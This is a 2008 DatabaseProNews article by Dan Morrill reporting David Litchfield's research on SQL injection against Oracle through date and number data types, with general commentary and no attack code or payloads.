Click here to read the latest newsletter! This is an iEntry.com Website
Search iEntry News
Submit Your Site For Free!

Email Address:
* URL:
*
*Indicates Mandatory Field

Terms & Conditions

DatabaseProNews
SecurityProNews
ITmanagement








New Oracle Hack

By Dan Morrill
Expert Author
Article Date: 2008-04-30

Never assume anything, now you can't trust even typed data with oracle.

SQL injections are all over the Internet last week, and Security Researcher David Litchfield has published a paper on a new Oracle hack using date and number data types. The paper on the attack method can be found here and was published on Thursday. You can read the paper here.
In a SQL injection, attackers create specially crafted search terms that trick the database into running SQL commands. Previously, security experts thought that SQL injections would work only if the attacker was inputting character strings into the database, but Litchfield has shown that the attack can work using new types of data, known as date and number data types. Source: Computer World
There is a sense of irony here that databases and injection attacks are all the rage again, as databases in the past have seemingly gone through various iterations of being vulnerable since the acoustic modem was invented and people just didn't seem to put passwords on anything at all. Since then we have seen attacks against database systems culminating in the SQL Blaster, but now we are very deep into the whole idea of subverting exposed calls, and making those calls do neat and interesting things.

Oracle to date didn't have a specific hack, this is what makes Davids paper worth the read, the two data types, Number and Date previously were thought to not be an issue. The question though that should be perking up through the ranks is if Oracle which uses the same standards body as any relational database has this issue, is the same issue present in Microsoft SQL Server, IBM's database system and MySQL along with a number of smaller less used databases.

Read the paper, could be interesting in the longer run.

Comments
About the Author:
Dan Morrill has been in the information security field for 18 years, both civilian and military, and is currently working on his Doctor of Management. Dan shares his insights on the important security issues of today through his blog, Managing Intellectual Property & IT Security, and is an active participant in the ITtoolbox blogging community.


Newsletter Archive | Article Archive | Submit Article | Advertising Information | About Us | Contact

DatabaseProNews is an iEntry, Inc.® publication - 1998-2008 All Rights Re
All Rights Reserved Privacy Policy and Legal